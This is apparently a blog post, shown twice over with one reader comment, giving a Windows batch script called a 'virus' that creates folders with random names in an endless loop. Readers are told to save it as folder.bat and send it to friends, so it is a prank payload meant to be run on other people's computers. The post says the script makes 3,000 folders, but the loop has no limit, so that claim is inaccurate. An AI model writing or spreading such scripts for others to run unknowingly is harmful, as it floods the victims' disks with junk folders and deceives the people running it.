Make a virus to create 3,000 folders
Hi,
u can create a virus in notepad that create 3,000
folder with one click.
Open notepad and type following:
@echo off
:top
md %random%
goto top
and save as folder.bat
Send to ur friends and enjoy.
Hi,
u can create a virus in notepad that create 3,000
folder with one click.
Open notepad and type following:
@echo off
:top
md %random%
goto top
and save as folder.bat
Send to ur friends and enjoy.
if we open this notepad files what will happen
ReplyDelete